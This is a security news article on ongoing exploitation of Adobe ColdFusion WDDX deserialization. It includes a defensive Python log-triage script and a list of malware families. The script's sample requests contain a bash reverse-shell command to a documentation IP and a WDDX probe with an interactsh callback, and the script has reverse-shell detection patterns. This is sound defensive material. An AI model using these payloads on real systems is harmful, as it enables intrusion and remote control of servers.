Fortinet Uncovers Ongoing Threat Exploitation Targeting Adobe ColdFusion
Fortinet recently reported continuing in-the-wild exploitation of Adobe ColdFusion, Adobe's commercial platform for building Java-based web applications. Although Adobe published three security bulletins in July 2023 (APSB23-40, APSB23-41 and APSB23-47) to address critical vulnerabilities, FortiGuard Labs IPS telemetry continues to record numerous attempts against one of them: the deserialization of untrusted WDDX data carried in ColdFusion requests.
The Risk of Arbitrary Code Execution
This vulnerability is particularly critical because a successful deserialization yields arbitrary code execution on the server, giving a remote attacker control of the host. The observed attacks follow a familiar pattern: attackers first probe with the interactsh out-of-band callback service to confirm that a payload executed, and then establish reverse shells to gain interactive, unauthorized access to the target.
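As an added illustration, not Fortinet's code and not a reproduction of the exploit itself, the following Python triage helper walks constructed web-server request records and raises findings for the three things the report describes: a WDDX packet arriving in a request to a ColdFusion endpoint, a callback to an interactsh out-of-band domain, and a common reverse-shell command string. The interactsh domain list, the struct `type` class-hint heuristic, the sample paths, the class name `com.example.Bean` and the request bodies are all assumptions made for this example.

```python
"""
Request-log triage for the ColdFusion activity described above.

Added example, not Fortinet's code and not a reproduction of any exploit.
It URL-decodes web-server request records (constructed samples, not real
telemetry) and raises findings for three things the report describes:
a WDDX packet arriving in a request to a ColdFusion endpoint, a callback
to an interactsh out-of-band domain, and common reverse-shell strings.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from urllib.parse import unquote_plus

# Assumption: the default out-of-band domains used by the public interactsh
# client. An attacker running a private interactsh server would use another
# domain, so treat this list as a starting point, not a complete one.
INTERACTSH_DOMAINS = ("oast.pro", "oast.live", "oast.site",
                      "oast.online", "oast.fun", "oast.me", "interact.sh")

COLDFUSION_PATH = re.compile(r"\.(?:cfc|cfm)\b", re.I)
WDDX_PACKET = re.compile(r"<\s*wddxPacket\b", re.I)
# Assumption for the stronger signal: a <struct> whose 'type' attribute
# carries a package-qualified Java class name asks the deserializer to
# instantiate that class. WDDX that ColdFusion generates for plain structs
# has no such hint, so its presence is the thing to escalate on.
WDDX_CLASS_HINT = re.compile(
    r"<\s*struct\b[^>]*\btype\s*=\s*['\"]"
    r"([A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)+)['\"]", re.I)
# Common Linux reverse-shell idioms; extend with what your environment sees.
REVERSE_SHELL = re.compile(r"/dev/tcp/|\bnc\b[^;|&]*\s-e\s|bash\s+-i\s*>&", re.I)


@dataclass
class Finding:
    request_id: int
    indicator: str
    severity: str
    detail: str


def analyze(request_id: int, path: str, body: str) -> list[Finding]:
    """Decode one request and return the indicators it trips."""
    text = unquote_plus(path) + "\n" + unquote_plus(body)
    findings: list[Finding] = []

    # WDDX is only interesting when it reaches a ColdFusion handler.
    if COLDFUSION_PATH.search(path) and WDDX_PACKET.search(text):
        hint = WDDX_CLASS_HINT.search(text)
        if hint:
            findings.append(Finding(request_id, "wddx-class-hint", "high",
                                    f"struct type={hint.group(1)}"))
        else:
            # Legitimate code can pass WDDX; record it for review, not alert.
            findings.append(Finding(request_id, "wddx-packet", "medium",
                                    "WDDX packet in ColdFusion request"))

    lowered = text.lower()
    for domain in INTERACTSH_DOMAINS:
        if domain in lowered:
            findings.append(Finding(request_id, "interactsh-callback", "high", domain))
            break

    shell = REVERSE_SHELL.search(text)
    if shell:
        findings.append(Finding(request_id, "reverse-shell", "high",
                                shell.group(0).strip()))
    return findings


def triage(requests: list[tuple[int, str, str]]) -> list[Finding]:
    """Run analyze() over (id, path, body) records and collect findings."""
    out: list[Finding] = []
    for request_id, path, body in requests:
        out.extend(analyze(request_id, path, body))
    return out


# Constructed sample requests (hypothetical paths, a hypothetical class name
# com.example.Bean, and 203.0.113.5 from the documentation address range).
SAMPLE_REQUESTS = [
    (1, "/index.cfm?page=home", ""),
    (2, "/api/Cart.cfc?method=update",
     "argumentCollection=%3CwddxPacket+version%3D%271.0%27%3E%3Cheader/%3E"
     "%3Cdata%3E%3Cstruct%3E%3Cvar+name%3D%27qty%27%3E%3Cnumber%3E2"
     "%3C/number%3E%3C/var%3E%3C/struct%3E%3C/data%3E%3C/wddxPacket%3E"),
    (3, "/api/Probe.cfc?method=ping",
     "argumentCollection=%3CwddxPacket+version%3D%271.0%27%3E%3Cheader/%3E"
     "%3Cdata%3E%3Cstruct+type%3D%27com.example.Bean%27%3E%3Cvar+name%3D%27url%27%3E"
     "%3Cstring%3Ehttp://abc123.oast.fun%3C/string%3E%3C/var%3E%3C/struct%3E"
     "%3C/data%3E%3C/wddxPacket%3E"),
    (4, "/cfusion/run.cfm",
     "cmd=bash+-i+%3E%26+/dev/tcp/203.0.113.5/4444+0%3E%261"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_REQUESTS):
        print(f"request {f.request_id}: {f.indicator} [{f.severity}] {f.detail}")
```

Sample 2 shows why the plain WDDX check is rated medium rather than high: ColdFusion code can legitimately pass WDDX in `argumentCollection`, so only the class hint, the callback domain and the shell string should page anyone. Private interactsh deployments use their own domains, so pair the domain check with DNS logs for requests to unknown domains originating from the ColdFusion host.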
Identified Malware Variants
FortiGuard Labs identified four malware variants being used in these attacks:
- XMRig Miner: Utilizes system resources to mine for Monero cryptocurrency
- Satan DDoS/Lucifer: A hybrid bot that combines cryptojacking and DDoS capabilities
- RudeMiner/SpreadMiner: A cryptojacking bot similar to Lucifer that mines cryptocurrency on the compromised host
- BillGates/Setag: A backdoor that takes over the compromised system, communicates with command-and-control servers and launches attacks on command
Urgent Call to Action
Patches for all three bulletins have been available since July, yet exploitation in the wild continues. FortiGuard Labs strongly advises administrators to upgrade affected ColdFusion installations promptly and to apply FortiGuard protection to block probing and exploitation attempts.
For more information and guidance on securing Adobe ColdFusion and defending against these ongoing threats, visit Fortinet’s official website.